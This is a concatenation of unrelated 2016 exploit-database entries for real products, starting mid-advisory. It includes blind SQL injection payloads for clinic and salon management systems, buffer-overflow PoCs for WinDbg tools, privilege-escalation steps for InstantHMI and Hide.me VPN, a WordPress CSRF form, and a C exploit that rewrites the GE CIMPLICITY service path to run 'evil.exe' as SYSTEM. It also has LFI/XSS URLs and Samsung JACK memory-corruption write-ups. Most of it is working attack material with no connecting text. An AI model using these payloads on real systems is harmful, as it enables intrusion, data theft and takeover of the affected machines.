Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).
(https://en.wikipedia.org/wiki/Adobe_Acrobat)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-18: Sébastien Morin and Pier-Luc Maltais of COSIG report this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe fixed the issue (APSB16-26);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to part of dynamically allocated memory using a user interaction
that opens a specially crafted PDF file containing an invalid font (.ttf ) including invalid data.
#####################################################################################
===========
4) POC
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-30.pdf
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40095.zip
####################################################################################
####
# Vulnerability Title : Clinic Management System Unauthenticated Blind SQL Injection (apointment.php age) Vulnerability
# Date : 11/07/2016
# Exploit Author : Yakir Wizman
# Vendor Homepage : http://rexbd.net/software/clinic-management-system
# Version : All Versions
# Tested on : Apache | PHP 5.5.36 | MySQL 5.6.30
####
####
# Vendor Software Description:
# Clinico – Clinic Management System is powerful, flexible, and easy to use responsive platform.
# The system has control for all system modules thats enables you to develop your organization billing system and improve its effectiveness and quality.
####
# No authentication (login) is required to exploit this vulnerability.
# Blind SQL Injection Proof-Of-Concept (Using SQLMap)
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# URL example : http://server/apointment.php
#
# Page : apointment.php
# Parameter : age (POST)
# Type : AND/OR time-based blind
# Title : MySQL >= 5.0.12 AND time-based blind
# Payload : ame=Test&age=24’ AND SLEEP(5) AND 'dQNv'='dQNv&sex=on&mobile=+972-50-7655443&email=test@gmail.com&date=07/12/2016&btext=Test
#
####
####
# Vulnerability Title : Beauty Parlour & SPA Saloon Management System Unauthenticated Blind SQL Injection (booking.php age) Vulnerability
# Date : 11/07/2016
# Exploit Author : Yakir Wizman
# Vendor Homepage : http://rexbd.net/software/beauty-parlour-and-spa-saloon-management-system
# Version : All Versions
# Tested on : Apache | PHP 5.5.36 | MySQL 5.6.30
####
# Software Link : N/A
# Google Dork : N/A
# CVE : N/A
####
# Vendor Software Description:
# Managing a health and beauty business is a unique endeavor that is unlike any other. You want an operating software that will enhance the atmosphere you’ve worked hard to instill in your salon.
# Our salon management system was created to effectively match the needs of health and beauty business owners nationwide.
# When you purchase this beauty Parlour / salon software, you will find that every aspect of managing your company is covered in this extensive system.
####
# No authentication (login) is required to exploit this vulnerability.
# Blind SQL Injection Proof-Of-Concept (Using SQLMap)
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# URL example : http://server/booking.php
#
# Page : booking.php
# Parameter : age (POST)
# Type : AND/OR time-based blind
# Title : MySQL >= 5.0.12 AND time-based blind
# Payload : name=Test&age=2016' AND SLEEP(5) AND 'hhFr'='hhFr&sex=on&mobile=+972-50-7655443&email=test@gmail.com&date=07/12/2016&btext=Test
#
####
[+] Credits: HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MS-WINDBG-LOGVIEWER-BUFFER-OVERFLOW.txt
[+] ISR: ApparitionSec
Vendor:
=================
www.microsoft.com
Product:
====================
WinDbg logviewer.exe
LogViewer (logviewer.exe), a tool that displays the logs created, part of
WinDbg application.
Vulnerability Type:
===================
Buffer Overflow DOS
Vulnerability Details:
=====================
Buffer overflow in WinDbg "logviewer.exe" when opening corrupted .lgv
files. App crash then Overwrite of MMX registers etc...
this utility belongs to Windows Kits/8.1/Debuggers/x86
Read Access Violation / Memory Corruption
Win32 API Log Viewer
6.3.9600.17298
Windbg x86
logviewer.exe
Log Viewer 3.01 for x86
(5fb8.32fc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
C:\Windows\syswow64\msvcrt.dll -
eax=013dad30 ebx=005d0000 ecx=00000041 edx=00000000 esi=005d2000
edi=013dcd30
eip=754fa048 esp=0009f840 ebp=0009f848 iopl=0 nv up ei pl nz na pe
nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
efl=00210206
msvcrt!memmove+0x1ee:
754fa048 660f6f06 movdqa xmm0,xmmword ptr [esi]
ds:002b:005d2000=????????????????????????????????
gs 2b
fs 53
es 2b
ds 2b
edi 136cd30
esi 7d2000
ebx 7d0000
edx 0
ecx 41
eax 136ad30
ebp df750
eip 754fa048
cs 23
efl 210206
esp df748
ss 2b
dr0 0
dr1 0
dr2 0
dr3 0
dr6 0
dr7 0
di cd30
si 2000
bx 0
dx 0
cx 41
ax ad30
bp f750
ip a048
fl 206
sp f748
bl 0
dl 0
cl 41
al 30
bh 0
dh 0
ch 0
ah ad
fpcw 27f
fpsw 4020
fptw ffff
fopcode 0
fpip 76454c1e
fpipsel 23
fpdp 6aec2c
fpdpsel 2b
st0 -1.00000000000000e+000
st1 -1.00000000000000e+000
st2 -1.00000000000000e+000
st3 9.60000000000000e+001
st4 1.08506945252884e-004
st5 -1.00000000000000e+000
st6 0.00000000000000e+000
st7 0.00000000000000e+000
mm0 0:2:2:2
mm1 0:0:2:202
mm2 0:1:1:1
mm3 c000:0:0:0
mm4 e38e:3900:0:0
mm5 0:0:0:0
mm6 0:0:0:0
mm7 0:0:0:0
mxcsr 1fa0
xmm0 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
xmm1 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
xmm2 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
xmm3 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
xmm4 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
xmm5 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
xmm6 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
xmm7 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
iopl 0
of 0
df 0
if 1
tf 0
sf 0
zf 0
af 0
pf 1
cf 0
vip 0
vif 0
xmm0l 4141:4141:4141:4141
xmm1l 4141:4141:4141:4141
xmm2l 4141:4141:4141:4141
xmm3l 4141:4141:4141:4141
xmm4l 4141:4141:4141:4141
xmm5l 4141:4141:4141:4141
xmm6l 4141:4141:4141:4141
xmm7l 4141:4141:4141:4141
xmm0h 4141:4141:4141:4141
xmm1h 4141:4141:4141:4141
xmm2h 4141:4141:4141:4141
xmm3h 4141:4141:4141:4141
xmm4h 4141:4141:4141:4141
xmm5h 4141:4141:4141:4141
xmm6h 4141:4141:4141:4141
xmm7h 4141:4141:4141:4141
xmm0/0 41414141
xmm0/1 41414141
xmm0/2 41414141
xmm0/3 41414141
xmm1/0 41414141
xmm1/1 41414141
xmm1/2 41414141
xmm1/3 41414141
xmm2/0 41414141
xmm2/1 41414141
xmm2/2 41414141
xmm2/3 41414141
xmm3/0 41414141
xmm3/1 41414141
xmm3/2 41414141
xmm3/3 41414141
xmm4/0 41414141
xmm4/1 41414141
xmm4/2 41414141
xmm4/3 41414141
xmm5/0 41414141
xmm5/1 41414141
xmm5/2 41414141
xmm5/3 41414141
xmm6/0 41414141
xmm6/1 41414141
xmm6/2 41414141
xmm6/3 41414141
xmm7/0 41414141
xmm7/1 41414141
xmm7/2 41414141
xmm7/3 41414141
Exploit code(s):
===============
1) create .lgv file with bunch of 'A's length of 4096 overwrites XXM
registers, ECX etc
2) run from command line pipe the file to it to watch it crash and burn.
///////////////////////////////////////////////////////////////////////
Disclosure Timeline:
===============================
Vendor Notification: June 23, 2016
Vendor acknowledged: July 1, 2016
Vendor reply: Will not fix (stability issue)
July 8, 2016 : Public Disclosure
Severity Level:
================
Low
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
HYP3RLINX
'''
[+] Credits: HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MS-KILL-UTILITY-BUFFER-OVERFLOW.txt
[+] ISR: ApparitionSec
Vendor:
=================
www.microsoft.com
Product:
=========================================
Microsoft Process Kill Utility "kill.exe"
File version: 6.3.9600.17298
The Kill tool (kill.exe), a tool used to terminate a process, part of the
WinDbg program.
Vulnerability Type:
===================
Buffer Overflow
SEH Buffer Overflow @ about 512 bytes
Vulnerability Details:
=====================
Register dump
'SEH chain of main thread
Address SE handler
001AF688 kernel32.756F489B
001AFBD8 52525252
42424242 *** CORRUPT ENTRY ***
001BF81C 41414141 AAAA
001BF820 41414141 AAAA
001BF824 41414141 AAAA
001BF828 41414141 AAAA
001BF82C 41414141 AAAA
001BF830 41414141 AAAA
001BF834 909006EB ë Pointer to next SEH record
001BF838 52525252 RRRR SE handler <================
001BF83C 90909090
001BF840 90909090
Exploit code(s):
================
Python POC.
'''
junk="A"*508+"RRRR"
pgm='c:\\Program Files (x86)\\Windows Kits\\8.1\\Debuggers\\x86\\kill.exe '
subprocess.Popen([pgm, junk], shell=False)
'''
Disclosure Timeline:
==================================
Vendor Notification: June 24, 2016
Vendor reply: Will not security service
July 8, 2016 : Public Disclosure
Exploitation Technique:
=======================
Local
Severity Level:
================
Low
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
HYP3RLINX
'''
Title: InstantHMI - EoP: User to ADMIN
CWE Class: CWE-276: Incorrect Default Permissions
Date: 01/06/2016
Vendor: Software Horizons
Product: InstantHMI
Version: 6.1
Download link: http://www.instanthmi.com/ihmisoftware.htm
Tested on: Windows 7 x86, fully patched
Release mode: no bugbounty program, public release
Installer Name: IHMI61-PCInstall-Unicode.exe
MD5: ee3ca3181c51387d89de19e89aea0b31
SHA1: c3f1929093a3bc28f4f8fdd9cb38b1455d7f0d6f
- 1. Introduction: -
During a standard installation (default option) the installer
automatically creates a folder named "IHMI-6" in the root drive.
No other location can be specified during standard installation.
As this folder receives default permissions AUTHENTICATED USERS
are given the WRITE permission.
Because of this they can replace binaries or plant malicious
DLLs to obtain elevated, administrative level, privileges.
- 2. Technical Details/PoC: -
A. Obtain and execute the installer.
B. Observe there is no prompt for the installation location.
C. Review permissions under the Explorer Security tab or run icacls.exe
Example:
IHMI-6 BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
Successfully processed 1 files; Failed processing 0 files
D. Change the main executable: InstantHMI.exe with a malicious copy.
E. Once executed by an administrator our code will run
under administrator level privileges.
- 3. Mitigation: -
A. Install under "c:\program files" or "C:\Program Files (x86)"
B. set appropriate permissions on the application folder.
- 4. Author: -
sh4d0wman
######################
# Exploit Title : WordPress Lazy content Slider Plugin - CSRF Vulnerability
# Exploit Author : Persian Hack Team
# Vendor Homepage : https://wordpress.org/support/view/plugin-reviews/lazy-content-slider
# Category: [ Webapps ]
# Tested on: [ Win ]
# Version: 3.4
# Date: 2016/07/08
######################
#
# PoC:
# The vulnerable page is
# /wp-content/plugins/lazy-content-slider/lzcs_admin.php
# The Code for CSRF.html is
<html>
<form action="http://localhost/wp/wp-admin/admin.php?page=lazy-content-slider%2Flzcs.php" method="POST">
<input name="lzcs" type="text" value="lzcs">
<input name="lzcs_color" type="text" value="dark">
<input type="text" name="lzcs_count" value="5">
<input type="submit" value="go!!">
</form>
</html>
#
######################
# Discovered by : Mojtaba MobhaM
# Greetz : T3NZOG4N & FireKernel & Dr.Askarzade & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R And All Persian Hack Team Members
# Homepage : http://persian-team.ir
######################
Title: Hide.Me VPN Client - EoP: User to SYSTEM
CWE Class: CWE-276: Incorrect Default Permissions
Date: 01/06/2016
Vendor: eVenture
Product: Hide.Me VPN Client
Version: 1.2.4
Download link: https://hide.me/en/software/windows
Tested on: Windows 7 x86, fully patched
Release mode: no bugbounty program, public release
Installer Name: Hide.me-Setup-1.2.4.exe
MD5: e5e5e2fa2c9592660a180357c4482740
SHA1: 4729c45d6399c759cd8f6a0c5773e08c6c57e034
- 1. Introduction: -
The installer automatically creates a folder named "hide.me VPN" under
c:\program files\ for the software.
No other location can be specified during installation.
The folder has insecure permissions allowing EVERYONE the WRITE permission.
Users can replace binaries or plant malicious DLLs to obtain elevated privileges.
As the software is running one executable as service under SYSTEM
permissions an attacker could elevate from regular user to SYSTEM.
- 2. Technical Details/PoC: -
A. Obtain and execute the installer.
B. Observe there is no prompt to specify an installation location.
C. Review permissions under the Explorer Security tab or run icacls.exe
Example:
C:\Program Files\hide.me VPN Everyone:(OI)(CI)(M)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
Successfully processed 1 files; Failed processing 0 files
C. A user can overwrite an executable or drop a malicious DLL to obtain code execution.
The highest permissions are reached by overwriting the service executable: vpnsvc.exe
However it is running at startup and can't be stopped by a non-privileged user.
As we can write to the directory we can rename all of the DLL's to DLL.old
C:\Program Files\hide.me VPN\Common.dll
C:\Program Files\hide.me VPN\SharpRaven.dll
C:\Program Files\hide.me VPN\ComLib.dll
C:\Program Files\hide.me VPN\vpnlib.dll
C:\Program Files\hide.me VPN\Newtonsoft.Json.dll
C:\Program Files\hide.me VPN\DotRas.dll
Once renamed, reboot the machine, log on as normal user.
E. Observe both application AND the system service have crashed.
Now replace vpnsvc.exe with a malicious copy.
Place back all original DLLS and reboot.
Our code will get executed under elevated permissions: SYSTEM.
- 3. Mitigation: -
A. set appropriate permissions on the application folder.
- 4. Author: -
sh4d0wman
/*
# Exploit Title: GE Proficy HMI/SCADA CIMPLICITY 8.2 Local Privilege Escalation Exploit(0 day)
# Vulnerability Discovery and Exploit Author: Zhou Yu
# Email: <504137480@qq.com>
# Version: 8.2
# Tested on: Windows 7 SP1 X32
# CVE : None
Vulnerability Description:
SERVICE_CHANGE_CONFIG Privilege Escalation
C:\Users\lenovo\Desktop\AccessChk>accesschk.exe -q -v -c CimProxy
CimProxy
Medium Mandatory Level (Default) [No-Write-Up]
RW Everyone
SERVICE_ALL_ACCESS
C:\Users\lenovo\Desktop\AccessChk>sc qc CimProxy
[SC] QueryServiceConfig �ɹ�
SERVICE_NAME: CimProxy
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Proficy\Proficy CIMPLICITY\exe\Cim
Proxy.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : CIMPLICITY Proxy Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
Usage:
Put evil.exe and the exploit in the same folder and then run the exploit.
*/
#include <windows.h>
#include <stdio.h>
#include <string.h>
void main()
{
char szPath[MAX_PATH];
char *t;
GetModuleFileName(NULL,szPath,MAX_PATH);
t = strrchr(szPath, 0x5C);
t[0] = '\\';
t[1] = '\0';
strcat(szPath,"evil.exe\"");
char t1[] = "\"cmd.exe /c ";
char payload[] = "sc config CimProxy binPath= ";
strcat(t1,szPath);
strcat(payload,t1);
system(payload);
//stop service
printf("stop service!\n");
system("net stop CimProxy");
//start service
printf("start service!\n");
system("net start CimProxy");
}
OPAC KpwinSQL LFI/XSS Vulnerabilities
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Product Website : http://www.kpsys.cz/
Affected version: All
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Description:
KpwinSQL suffers from an unauthenticated file inclusion vulnerability (LFI) when input passed thru the 'lang' parameter to the following scripts which are not properly verified:
+ index.php
+ help.php
+ logpin.php
+ brow.php
+ indexs.php
+ search.php
+ hledani.php
+ hled_hesl.php
before being used to include files. This can be exploited to include files from local resources with their absolute path and with directory traversal attacks.
Moreover, KpwinSQL system suffers from Cross Site Scripting vulnerability when input passed thru the 'vyhl' parameter to 'index.php' script which does not perform input validation.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Tested on: Apache/2.2.11 (Win32)
PHP/5.2.9-2
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Vulnerabilities discovered by Yakir Wizman
https://www.linkedin.com/in/yakirwizman
Date: 06.07.2016
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Proof Of Concept:
Local File Inclusion example:
http://server/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
Cross Site Scripting example:
http://server/index.php?vyhl='><script>alert('XSS')</script>&lang=cze
Sources:
https://bugs.chromium.org/p/project-zero/issues/detail?id=796
https://bugs.chromium.org/p/project-zero/issues/detail?id=795
The usermode audio subsystem for the "Samsung Android Professional Audio" is
based on JACK, which appears to be designed for single-user usage. The common
JACK configuration on Linux systems appears to be a JACK server running under
the current user account, and interacting with JACK clients from the same user
account; so with a minimal privilege difference; this is not the case with the
configuration on Android, where the JACK service runs as a more privileged user
in a less restrictive SELinux domain to the clients that can connect to it.
The shared memory implementation (implemented by com.samsung.android.IAndroidShm
system service) allows any application to access/modify/map shared memory pages
used by JACK, regardless of which application created those shared memory pages.
(NB: This possibly results in breaking the Android permissions model and
permitting applications without the required capability to access microphone
input; this was not investigated further.)
There are multiple possible ways to corrupt the internal state of any of the
shared-memory backed c++ objects in use; attached is a PoC that uses the shared
memory service to map the JackEngineControl object in use, and modify the value
of the fDriverNum member, which is used in several places without validation.
This is highly likely not the only variable stored in shared memory that is used
without proper validation; and the function shown below is definitely not the
only place that this particular variable is used dangerously. To secure this
interface it will be necessary to review all uses of variables stored in these
shared memory interfaces.
/*!
\brief Engine control in shared memory.
*/
PRE_PACKED_STRUCTURE
struct SERVER_EXPORT JackEngineControl : public JackShmMem
{
// Shared state
jack_nframes_t fBufferSize;
jack_nframes_t fSampleRate;
bool fSyncMode;
bool fTemporary;
jack_time_t fPeriodUsecs;
jack_time_t fTimeOutUsecs;
float fMaxDelayedUsecs;
float fXrunDelayedUsecs;
bool fTimeOut;
bool fRealTime;
bool fSavedRealTime; // RT state saved and restored during Freewheel mode
int fServerPriority;
int fClientPriority;
int fMaxClientPriority;
char fServerName[JACK_SERVER_NAME_SIZE+1];
JackTransportEngine fTransport;
jack_timer_type_t fClockSource;
int fDriverNum;
bool fVerbose;
// CPU Load
jack_time_t fPrevCycleTime;
jack_time_t fCurCycleTime;
jack_time_t fSpareUsecs;
jack_time_t fMaxUsecs;
jack_time_t fRollingClientUsecs[JACK_ENGINE_ROLLING_COUNT];
unsigned int fRollingClientUsecsCnt;
int fRollingClientUsecsIndex;
int fRollingInterval;
float fCPULoad;
// For OSX thread
UInt64 fPeriod;
UInt64 fComputation;
UInt64 fConstraint;
// Timer
JackFrameTimer fFrameTimer;
#ifdef JACK_MONITOR
JackEngineProfiling fProfiler;
#endif
...
This is quite a convenient exploitation primitive, as a small negative value
will cause the code in several places to index backwards from a known array;
when (any of the similar functions to the below are called, table is pointing
to the fClientTable array inside a JackEngine instance)
void JackTransportEngine::MakeAllLocating(JackClientInterface** table)
{
for (int i = GetEngineControl()->fDriverNum; i < CLIENT_NUM; i++) {
JackClientInterface* client = table[i];
if (client) {
JackClientControl* control = client->GetClientControl();
control->fTransportState = JackTransportStopped;
control->fTransportSync = true;
control->fTransportTimebase = true;
jack_log("MakeAllLocating ref = %ld", i);
}
}
}
class SERVER_EXPORT JackEngine : public JackLockAble
{
friend class JackLockedEngine;
private:
JackGraphManager* fGraphManager;
JackEngineControl* fEngineControl;
char fSelfConnectMode;
JackClientInterface* fClientTable[CLIENT_NUM];
We can see that just behind the fClientTable, we have two pointers to other
objects; a JackEngineControl and a JackGraphManager, both of which are backed by
shared memory. Since we are treating the pointer read from table as a c++ object
with a vtable pointer, this lets us trivially gain control of the flow of
execution.
Fatal signal 11 (SIGSEGV), code 1, fault addr 0x41414140 in tid 27197 (jackd)
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
Build fingerprint: 'samsung/zeroltexx/zerolte:6.0.1/MMB29K/G925FXXU3DPAD:user/release-keys'
Revision: '10'
ABI: 'arm'
pid: 27181, tid: 27197, name: jackd >>> /system/bin/jackd <<<
AM write failed: Broken pipe
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x41414140
r0 f3f1a000 r1 f48c2010 r2 f48c2010 r3 41414141
r4 f3f1a000 r5 00000036 r6 f3dbf930 r7 00000078
r8 f72c8b9c r9 f6f1a308 sl f3d3f000 fp f719a991
ip f71d7a0c sp f3dbf7d8 lr f7196c43 pc 41414140 cpsr 800f0030
backtrace:
#00 pc 41414140 <unknown>
#01 pc 0003cc41 /system/lib/libjackserver.so (Jack::JackTransportEngine::MakeAllLocating(Jack::JackClientInterface**)+52)
#02 pc 0003cda1 /system/lib/libjackserver.so (Jack::JackTransportEngine::CycleEnd(Jack::JackClientInterface**, unsigned int, unsigned int)+228)
#03 pc 00048bd5 /system/lib/libjackserver.so
#04 pc 00049211 /system/lib/libjackserver.so (Jack::JackEngine::Process(unsigned long long, unsigned long long)+228)
#05 pc 000442fd /system/lib/libjackserver.so
#06 pc 00044f49 /system/lib/libjackserver.so (Jack::JackAudioDriver::ProcessGraphSyncMaster()+40)
#07 pc 00044f0d /system/lib/libjackserver.so (Jack::JackAudioDriver::ProcessGraphSync()+20)
#08 pc 00044e87 /system/lib/libjackserver.so (Jack::JackAudioDriver::ProcessSync()+94)
#09 pc 00044bbf /system/lib/libjackserver.so (Jack::JackAudioDriver::Process()+22)
#10 pc 0004fff1 /system/lib/libjackserver.so (Jack::JackThreadedDriver::Process()+24)
#11 pc 0005051f /system/lib/libjackserver.so (Jack::JackThreadedDriver::Execute()+18)
#12 pc 00040a0f /system/lib/libjackserver.so (Jack::JackAndroidThread::ThreadHandler(void*)+126)
#13 pc 0003fc53 /system/lib/libc.so (__pthread_start(void*)+30)
#14 pc 0001a38b /system/lib/libc.so (__start_thread+6)
Tombstone written to: /data/tombstones/tombstone_05
################################################################################################################
The usermode audio subsystem for the "Samsung Android Professional Audio" is
based on JACK, which appears to be designed for single-user usage. The common
JACK configuration on Linux systems appears to be a JACK server running under
the current user account, and interacting with JACK clients from the same user
account; so with a minimal privilege difference; this is not the case with the
configuration on Android, where the JACK service runs as a more privileged user
in a less restrictive SELinux domain to the clients that can connect to it.
The JACK shared memory implementation uses the struct jack_shm_info_t defined in
/common/shm.h to do some bookkeeping
PRE_PACKED_STRUCTURE
struct _jack_shm_info {
jack_shm_registry_index_t index; /* offset into the registry */
uint32_t size;
#ifdef __ANDROID__
jack_shm_fd_t fd;
#endif
union {
void *attached_at; /* address where attached */
char ptr_size[8];
} ptr; /* a "pointer" that has the same 8 bytes size when compling in 32 or 64 bits */
} POST_PACKED_STRUCTURE;
typedef struct _jack_shm_info jack_shm_info_t;
This struct is stored at the start of every JackShmAble object.
/*!
\brief
A class which objects possibly want to be allocated in shared memory derives from this class.
*/
class JackShmMemAble
{
protected:
jack_shm_info_t fInfo;
public:
void Init();
int GetShmIndex()
{
return fInfo.index;
}
char* GetShmAddress()
{
return (char*)fInfo.ptr.attached_at;
}
void LockMemory()
{
LockMemoryImp(this, fInfo.size);
}
void UnlockMemory()
{
UnlockMemoryImp(this, fInfo.size);
}
};
This means that whenever the JACK server creates an object backed by shared
memory, it also stores a pointer to that object (in the address space of the
JACK server), allowing a malicious client to bypass ASLR in the JACK server
process.
The PoC provided for the other reported JACK issue uses this to bypass ASLR in
the JACK server process.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40066.zip